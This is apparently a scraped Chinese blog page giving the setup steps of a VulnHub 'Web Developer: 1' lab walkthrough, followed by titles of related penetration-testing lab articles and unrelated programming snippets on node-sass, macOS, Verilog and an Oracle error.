vulnhub靶场WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机:WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
甄选靶场Vulnhub百个项目渗透——项目十九~二十:Wintermute-Neuromancer-Straylight(smtp突破,LFI利用,内网横向渗透,端口转发)
人间体佐菲的博客
09-22 1265
Wintermute-Neuromancer-Straylight(smtp突破,LFI利用,内网横向渗透,端口转发)网络安全,信息安全渗透测试
甄选靶场Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权
人间体佐菲的博客
09-24 876
Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)信息安全网络安全渗透测试
甄选靶场Vulnhub百个项目渗透——项目三十:Node-1(源码审计)
人间体佐菲的博客
10-02 1021
甄选靶场Vulnhub百个项目渗透——项目三十:Node-1(源码审计)
二进制文件(...compile-node-sass\node_modules\node-sass-china\vendor\darwin-x64-72\binding.node“)缺失
qq_52317104的博客
11-20 2068
uni-app安装scss/sass后报错:LibSass 的二进制文件("{hbuilderx_install_floder}\plugins\compile-node-sass\node_modules\node-sass-china\vendor\darwin-x64-72\binding.node")缺失 situations reappeared: 在使用uni-app开发小程序时,因为引入了第三方组件使用了sass,HBuilder默认没有安装‘scss/sass’插件,导致编译报错,于是用I
MacOS (Catalina):显示Read-only file system的对应方法
知行合一 止于至善
02-15 6万+
在Catalina版的macOS上以root身份登录,发现创建类似/data之类的目录会会提示Read-only file system,这篇文章介绍一下原因和对应方法。
【FPGA】Verilog:二进制并行加法器 | 超前进位 | 实现 4 位二进制并行加法器和减法器 | MSI/LSI 运算电路
有道无术, 术尚可求。有术无道, 止于术。
12-04 2770
被加数和加数的各位能同时并行到达各位的输入端,而各位全加器的进位输入则是按照由低位向高位逐级串行传递的,各进位形成一个进位链。
甄选靶场Vulnhub百个项目渗透——项目十四:VulOsv2(CMS利用,工控文件发掘)
人间体佐菲的博客
09-16 1112
网络安全,信息安全,网络空间安全渗透测试
甄选靶场Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权
人间体佐菲的博客
09-05 872
甄选靶场Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权
甄选靶场Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)
人间体佐菲的博客
09-30 924
甄选靶场Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)网络安全渗透测试
甄选靶场Vulnhub百个项目渗透——项目九:IMF-1(文件上传,缓冲区溢出)
人间体佐菲的博客
09-23 3089
Vulnhub百个项目渗透——项目九:IMF-1(文件上传,缓冲区溢出) 网络安全,信息安全渗透测试
甄选靶场Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权
人间体佐菲的博客
08-29 1750
Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权
甄选靶场Vulnhub百个项目渗透——项目三十七:SolidState-1(pop3,rbash逃逸,计划任务写入)
人间体佐菲的博客
10-11 743
甄选靶场Vulnhub百个项目渗透——项目三十七:SolidState-1(pop3,rbash逃逸,计划任务写入)
甄选靶场Vulnhub百个项目渗透——项目八:IMF-1(文件上传,缓冲区溢出)
人间体佐菲的博客
08-24 1281
甄选靶场Vulnhub百个项目渗透——项目八:IMF-1(文件上传,缓冲区溢出)
甄选靶场Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权
人间体佐菲的博客
10-10 1334
甄选靶场Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权
Mybatis-plus insert java.sql.SQLException: ORA-01465: 无效的十六进制数字
03-25
这个错误通常是由于在Oracle数据库中将十六进制字符串转换为二进制数据时出现问题。您可以尝试以下几个方法解决该问题: 1. 确保您使用的是正确的Oracle JDBC驱动程序。有时,不同版本的驱动程序对于将十六进制字符串转换为二进制数据的过程略有不同,因此请确保使用最新版本的驱动程序。 2. 如果您正在使用Mybatis-plus框架进行数据插入,请尝试使用java.sql.Blob或java.sql.Clob类型来处理二进制或大对象数据。这些类型可以更好地处理二进制或大对象数据,可能会更好地避免数据转换问题。 3. 如果您确信无效的十六进制数字是由于Mybatis-plus执行的SQL语句引起的,可能是您的SQL语句在插入二进制或大对象数据时出错。您可以使用Oracle SQL Developer或其他工具来手动插入相同的数据,以查看是否会引起相同的错误。如果是这种情况,您需要调整您的SQL语句,以使其能够正确插入二进制或大对象数据。 4. 最后,您可以考虑咨询Oracle支持团队,以获取更多关于ORA-01465错误的信息和有关如何解决该问题的建议。他们可能能够提供更好的解决方案,以帮助您克服该错误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值